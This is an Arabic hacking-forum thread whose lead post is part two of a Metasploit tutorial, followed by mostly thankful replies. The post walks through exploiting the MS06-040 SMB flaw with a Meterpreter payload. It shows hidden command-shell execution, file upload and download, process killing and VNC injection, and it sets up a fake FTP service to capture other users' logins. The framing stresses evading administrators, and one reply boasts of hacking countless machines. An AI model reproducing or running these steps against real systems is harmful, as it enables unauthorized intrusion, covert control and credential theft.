المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : طرق الإستخدام المتقدم لمشروع الميتاسبلويت الجزء ( 2 )



BLACK.JaGuAr
12-19-2009, 07:25 PM
http://www.samysoft.net/forumim/basmla/68565.gif
http://www.samysoft.net/forumim/slam/6867867.gif


مرحبا بكم من جديد ياأعضاء منتديات جيوش الهكر ، اليوم ان شاء الله راح نكمل بقية الجزء السابق وسنتناول بإذن الله موضوع الاستغلالات المتقدمة في مشروع ****sploit لنتابع ...


الاستغلالات المتقدمة في مشروع ****sploit


بشكل عام عندما نريد استغلال أي ثغرة Buffer Overflow موجودة في برنامج أو نظام تشغيل يجب أن نختار Payload أو مايعرف بالـ Shellcode وهو الكود الذي سيتم حقنه بالذاكرة وتشغيله بعد السيطرة على مسجّل EIP والتحكم في سير البرنامج (ان شاء الله سأبدأ بالكتابة عن ثغرات Buffer Overflow قريبا… ) الـ Shellcode هو مجموعة من الأوامر مبرمجة بلغة Assembly يستطيع المعالج فهمها وتنفيذها بشكل مباشر. يتميز ميتاسبلويت بأنه يحتوي على الكثير من الاستغلالات الجاهزة ويمكننا ببساطة صناعة الاستغلال الذي نريد بعد وضع الخيارات التي تناسبنا وتصديره لعدة صيغ مختلفة بكل سهولة! فباستخدام مشروع ****sploit ليس من الضروري أن تكون خبير بلغة Assembly لتتمكن صناعة شيل كود الخاص بك.


أهم الاستغلالات الموجودة وأقواها في مشروع ميتاسبلويت هو Meterpreter (خاص بنظام ويندوز فقط) يقوم هذا الاستغلال بحقن ملفات dll بنفس البرنامج/النظام الذي قمنا باستغلال الثغرة الموجودة فيه. هذا يعني أن مدير السيرفر لن يرى أي برنامج Process يعمل في قائمة المهام (لكن يمكن طبعا باستخدام أدوات متخصصة معرفة المكاتب الديناميكية المحملة للنظام لكني أتحدى أن أجد مدير أي سيرفر يستخدم أدوات مراقبة لهذه الدرجة!) أضف الى ذلك أننا سنحصل على تحكم أكثر من كامل في الجهاز وسنصبح قادرين على تشغيل عدة برامج تفاعلية بنفس الوقت دون أن نخسر الـ remote Shell بالاضافة لسهولة رفع وتنزيل الملفات وادارة الـ Processes التي تعمل بالجهاز والكثير من الأمور الأخرى ونستطيع القول أن هذا الاستغلال مشروع لوحده! حيث نستطيع برمجة سكريبتات واضافات خاصة له ومع كل تحديث يتم اضافة ميزات وقدرات جديدة له.


لنفرض أننا نريد استغلال الثغرة “windows/smb/ms06_040_netapi” وهي ثغرة أخرى بنفس خطورة الثغرة السابقة لكنها أقدم قليلا (اكتشفت في عامل 2006 بنظام Windows XP SP0/SP1) مع اختيار Meterpreter كـ Payload.. في البداية نشغّل سطر أوامر المشروع بتنفيذ الأمر:


./msfconsole


ثم ننفّذ الأوامر التالية:


msf > use windows/smb/ms06_040_netapi
msf exploit(ms06_040_netapi) > set RHOST 192.168.2.128
msf exploit(ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms06_040_netapi) > set LPORT 22445


قمنا في الأوامر السابقة بادخلال اعدادات الثغرة (راجع الجزء رقم ( 1 ) لمزيد من التفاصيل) الآن يبقى علينا تنفيذ الأمر exploit لتنفيذ الثغرة وعمل سطر أوامر Meterpreter كما هو واضح بالصورة التالية:




http://www.aljyyosh.info/upfiles/Atq27042.jpg


كأي برنامج أو أداة أخرى يجب أن نبحث عن طريقة الاستخدام, بدون تفكير ننفّذ الأمر help لمعرفة أوامر Meterpreter وكيفية التعامل معه:


meterpreter > help




http://www.aljyyosh.info/upfiles/1Y527042.jpg


لاحظ الخيارات الكثيرة التي يوفرها لنا Meterpreter وكيف أنه سهّل علينا كثير من الأمور حاول أن تقرأ وظيفة كل أمر وتقوم بتجربته, مثلا لرفع ملف للجهاز لم نعد بحاجة لتشغيل سيرفر TFTP في جهازنا واستخدام TFTP Client الموجود في نظام ويندوز بل نستطيع القيام بذلك بكل سهولة عن طريق الأمر:


meterpreter > upload FILENAME


استبدل FINLENAME باسم الملف الذي تريد رفعه مع مراعاة وجوده داخل مجلد المشروع ولتحميل ملف نستخدم نفس الأمر السابق مع استبدال upload بـ download:


meterpreter > download FILENAME



http://www.aljyyosh.info/upfiles/QOf27042.jpg


من أكثر الأمور التي أعجبتني في Meterpreter هي قدرتنا على تشغيل عدة برامج تفاعلية بنفس الوقت مثل ftp أداة Netcat بعد رفعها للاتصال مع جهاز ثاني والكثير من البرامج التفاعلية الأخرى التي لا نستطيع تشغيلها باستخدام الـ remote shell العادي. في البداية ننفذ الأمر execute للاطلاع على الخيارات المتوفرة:


meterpreter > execute


مثلا ننفذ الأمر:


meterpreter > execute -H -i -f cmd.exe


ليتم تشغيل سطر أوامر نظام ويندوز والحصول على remote Shell كامل كما هو واضح في الصورة:



http://www.aljyyosh.info/upfiles/Sv327042.jpg


استخدمنا H لاخفاء البرنامج من قائمة مهام نظام ويندوز و i للتفاعل المباشر مع البرنامج وتستخدم f لتحديد البرنامج الذي نريد تشغيله.. نستطيع بأي وقت الخروج والعودة لسطر أوامر Meterpreter بتنفيذ الأمر exit أو الضغط على (Ctrl + C) حسناً ماذا لو لم نرد التفاعل مع البرنامج مباشرة وأردنا تشغيله في الخلفية مع بقائنا داخل سطر أوامر Meterpreter بهذه الحالة نستخدم c عوضا عن i:


meterpreter > execute -H -c -f cmd.exe



http://www.aljyyosh.info/upfiles/nvb27042.jpg


وعندما نريد التفاعل مع البرنامج ننفذ الأمر interact متبوعاً برقم الـ Channel بهذا الشكل:


meterpreter > interact 10


في حال قمنا بتشغيل أكثر من برنامج بالطريقة السابقة ننفذ الأمر:


meterpreter > channel -l


لاستعراض البرامج التي قمنا بتشغيلها, كذلك نستطيع الاطلاع على البرامج التي تعمل على الجهاز باستخدام الأمر:


meterpreter > ps


ولايقاف تشغيل برنامج ننفذ الأمر:


meterpreter > kill PID


مع استبدال PID بعنوان البرنامج الذي نريد:



http://www.aljyyosh.info/upfiles/9FU27216.jpg


يوجد الكثير من الأوامر الأخرى بعضها مثل نظام لينوكس مثل ls , pwd , cat , mkdir , rmdir وأخرى متعلقة بالشبكات مثل ipconfig و route بالاضافة لأمر أعجبني هو portfwd أتوقع أن وظيفته واضحة.. لن أشرحه بل سأترككم لتجربوه بأنفسكم.

يوجد العديد من الاستغلالات الأخرى في مشروع ميتاسبلويت احداها vncinject الذي يقوم بحقن مكتبات dll خاصة ببرنامج RealVNC في الذاكرة مما يسمح لنا بالتحكم الكامل بسطح مكتب الجهاز الذي نجحنا باستغلال الثغرة الموجودة فيه:



http://www.aljyyosh.info/upfiles/sxM27216.jpg


وغيره الكثير مثل اضافة مستخدم جديد للنظام, رفع وتشغيل ملف, اتصال عكسي, فتح منفذ بالجهاز… كل ماعليك هو اختيار الاستغلال الأنسب فمثلا اذا كان الجهاز الذي نحاول اختراقه يستخدم جدار ناري فليس من الحكمة أن نختار استغلال يقوم بفتح منفذ بالجهاز bind_tcp لأننا ببساطة لن نتمكن من الاتصال به وبهذه الحالة يجب جعل الاستغلال اتصال عكسي reverse_tcp بعد التأكد من فتح المنفذ الذي قمنا باختياره في الجدار الناري الموجود في جهازنا وهكذا..


الأدوات المساعدة Auxiliary


شخصيا أجد أن الأدوات المساعدة المرفقة مع مشروع ميتاسبلويت من أجمل الأمور فيه فهي عبارة عن أدوات بسيطة تستخدم مكتبات مشروع ميتاسبلويت لتساعدنا في عملية الـ Penetration Testing واستغلال الثغرات, مثل Scanners, Fuzzers, Client Side/DoS Exploits , Fake Services… ونستطيع مشاهدة القائمة الكاملة بعد تشغيل الواجهة msfconsole وذلك بتنفيذ الأمر:


msf > show auxiliary



http://www.aljyyosh.info/upfiles/3cx27216.jpg



استخدام هذه الأدوات نفس طريقة استغلال الثغرات تماما ويأتي مع كل أداة شرح لوظيفتها وطريقة استخدامها, مثلا لنفرض أننا نريد انشاء خدمة FTP وهمية تقوم بالتقاط اسم المستخدم وكلمة المرور عند القيام بتسجيل الدخول, كل ماعلينا هو تنفيذ الأمر:


msf > use server/capture/ftp


ثم نحدد IP الجهاز الذي يعمل عليه المشروع, بتنفيذ الأمر:


msf auxiliary(ftp) > SET SRVHOST 192.168.2.1


وفي النهاية تنفيذ الأمر exploit لتشغيل الخدمة الوهمية, الآن في حال قام أي شخص بالاتصال بالجهاز عن طريق المنفذ 21 سنتمكن من التقاط اسم المستخدم وكلمة المرور التي قام بتسجيل الدخول بها.

ملاحظة: كوننا سنستخدم المنفذ 21 لتشغيل خدمة FTP الوهمية هذا سيتطلب منا تشغيل المشروع بصلاحيات root الا في حال قمنا باختيار منفذ ثان.

يوجد الكثير من الأدوات المساعدة الأخرى أنصح بتجربتها فاستخدامها ممتع وتفيدنا في الكثير من الأمور أثناء عملنا.


إلى هنا ونكون قد أنهينا الجزء الثاني بفضل الله ،وتابعونا في الجزء الثالث لمعرفة باقي الأستغلالات المتقدمة للمشروع إن شاء الله ، ترقبونا ...


ودمتم سالمين

ASDELY-ScOrPiOn
12-19-2009, 07:34 PM
بصراحة لا أستطيع التعليق على مدى إعجابي بمواضيعك وأسلوبك.
شرح واضح وكافي ومرفق بالصور والاهم من ذلك أنها حصرية على منتدانا فقط
يعني بصراحة... كل الإحترام
واصل وتقبل تحياتي

cs-man
01-23-2010, 08:07 PM
شكراا لك أخي

حاكم النت
01-27-2010, 03:08 PM
مشكوووووووووووووووووووووو وووووووووووووور

Next dream
02-09-2010, 12:13 PM
يعطيك الف عافيه



موضوع مميز بقلم مميز

axlrafik
02-14-2010, 01:18 AM
Thank you very much !!! it's amzing what are you're doing

السيد مارس
02-14-2010, 10:01 PM
مشكور يا بطل المتا سبلوت هو املنا الوحيد وانا بعشقه وسراره اكتيرة
وقول لك اخترقت بيه اجهزة عدد لا يحصى تحياتي لكم جميعا

كلاشينكوف
02-15-2010, 04:12 AM
إلا صلاتي ما أخليها

بارك الله فيك أخي

مشكور أخي

mr.joker.
12-30-2010, 07:53 AM
مشكور يا خوو على الموضوع الثاني

abdo el7dad
01-12-2011, 02:51 AM
السلام عليكم
الف شكر استاذنا وجزاك الله خيرا

فـــ22ـــارس
01-17-2011, 03:19 PM
بـــــــــــــــطــــــــ ـــــــــــل وبى انتظار الجزاء التالت

``-RaWaN-``
01-23-2011, 11:28 PM
thnx man for this

MaJDoViC
01-24-2011, 03:52 AM
بارك الله فيك أخي

متميز كما عهدناك

لا تحرمنا من جديدك

Scorpio
01-26-2011, 01:54 AM
شرح وافى وماااقصرت يالغلا

mr.kotch
01-27-2011, 06:46 PM
مشكور على الشرح المميز

killer silent
02-02-2011, 06:41 AM
مشكووووووووور

محمود مرزوقـ
05-12-2011, 01:53 AM
مشكور يا كبير

Ace
05-13-2011, 04:57 AM
كل الاحترام والتقدير على الموضوع الاكثر من رائع

sunlight
05-18-2011, 11:51 AM
شكرا لك وبارك الله فيك
مجهود رائع واصل ابداعك
وبالتوفيق لك ان شاءالله .

Rey NeGro
09-27-2011, 07:55 PM
أملي الوحيــــــــــد ان اتقن الميتا ... الشرح اكثر من رآآآئع شكرا من قلبي

sasouki_xXx
09-27-2011, 09:19 PM
merciiiiiiii

mahmoud_maizony
09-29-2011, 10:12 AM
مشكووووووووووووور واصل

trojansim
09-29-2011, 01:37 PM
مشكور حبيبي وتسلم ييمينك ياغالي

S.N_StrawHat
10-14-2011, 12:56 AM
على الرغم من كون الموضوع قديم بعض الشيئ ( قصدي تم كتابته في 2009 ) ,, الا انه جميل جداُ ومفيد للغاية و أن شاء الله يستفيد منه الاخوة المبتدئين...

تحياتي لك يا بطل أينما كنت :smile:

samilakehal
11-24-2011, 03:48 PM
موضوووووع في القمة مشكووووووووووووووووور

هكر الديوانيه
03-16-2012, 08:39 PM
مشكور ع الجهد البذول منك يا اخي الكريم

jaroud007
04-15-2012, 12:14 AM
مشكور اخي و جزاك الله الف خيرو الله االله ينورك اخي جميل
تقبل مروري موفق بإذن الله ... لك مني أجمل تحية .

....قَالَ رَسُولُ اللَّهِ صلى الله عليه وسلم ‏
(("‏‏ مَنْ سُئِلَ عَنْ عِلْمٍ فَكَتَمَهُ أَلْجَمَهُ اللَّهُ بِلِجَامٍ مِنْ نَارٍ يَوْمَ الْقِيَامَةِ ‏"‏‏ )).

فَقَاتِلْ فِي سَبِيلِ اللَّهِ لا تُكَلَّفُ إِلا نَفْسَكَ وَحَرِّضِ الْمُؤْمِنِينَ
عَسَى اللَّهُ أَنْ يَكُفَّ بَأْسَ الَّذِينَ كَفَرُوا وَاللَّهُ أَشَدُّ بَأْسًا وَأَشَدُّ تَنْكِيلا

وقوله تعالى :

[ وَلاَ تَحْسَبَنَّ الَّذِينَ قُتِلُواْ فِي سَبِيلِ اللّهِ أَمْوَاتاً بَلْ أَحْيَاء عِندَ رَبِّهِمْ يُرْزَقُونَ{169} فَرِحِينَ بِمَا آتَاهُمُ اللّهُ مِن فَضْلِهِ وَ يَسْتَبْشِرُونَ بِالَّذِينَ لَمْ

يَلْحَقُواْ بِهِم مِّنْ خَلْفِهِمْ أَلاَّ خَوْفٌ عَلَيْهِمْ وَلاَ هُمْ يَحْزَنُونَ{170} يَسْتَبْشِرُونَ بِنِعْمَةٍ مِّنَ اللّهِ وَفَضْلٍ وَأَنَّ اللّهَ لاَ يُضِيعُ أَجْرَ الْمُؤْمِنِينَ{171} ]

سورة آل عمران

( قُلْ إِنَّ صَلَاتِي وَنُسُكِي وَمَحْيَايَ وَمَمَاتِي لِلَّهِ رَبّ الْعَالَمِينَ، لَا شَرِيكَ لَهُ وَبِذَلِكَ أُمِرْتُ وَأَنَا أَوَّلُ الْمُسْلِمِينَ )

صدق الله العضيم
سبحان الله عدد ما كان وعدد ما سيكون وعدد الصمت والسكون
الا ان حزب الله هم الغالبون
لن تركع امة قائدها محمد (ص)

لا تأسف على الزمان لطالما بلت على جتث الاسود كلاب لا قصدها ان تعلوا على اسياديها تبقى الاسود أسود وكلاب كلا تبقى الاسود

مخيفة في اسرها حتى وان نبحت عليها الكلاب

قـُل مآشئـت في مسبتـي فسكُوتي عن آلحقيـرٍ .. جوٍآإب ..
ليس ضعفا مني ولكن مامن اسد يرد على خطب..الكلاب ...
تعلم للمنفعة أو لرد الضرر
مشكور اخي
__________________
قال: الرسول صلى الله عليه وسلم

1- { من ترك صلاة الفجر فليس في وجه نور }
2- { من ترك صلاة الظهر فليس في رزقة بركه }
3- { من ترك صلاةالعصرفليس في جسمه قوة }
4- { من ترك صلاة المغرب فليس في أولادة ثمرهـ}
5- { من ترك صلاة العشاء فليس فينومه رأحه}
مشكور اخي

قال رسول الله صلى الله عليه وآله وسلم : 'الحمد لله الذي تواضع كلُّ شيء لعظمته، الحمد لله الذي استسلم كلُّ شيء لقدرته، الحمد لله الذي ذلَّ كلُّ شيء لعزته، الحمد لله الذي خضع كل شيء لملكه
من قال هذا الدعاء مرة واحدة، تكتب له 1000 حسنة ويرفع به 1000 درجة، ويوكل الله له 70000 ملك يستغفرون له إلى يوم القيامة .
حق على من سمع هذا الدعاء يعلمه لغيره ……والدال على الخير كفاعله
لا تحسبوا رقصي بينكم طربا ***فإن الطير يرقص مدبوحا من شدة الإلم

سارة الغامدي
10-01-2012, 09:26 PM
يسلمؤؤؤؤؤؤ ..

sarahassan
10-02-2012, 10:03 PM
ابدااااااااااااع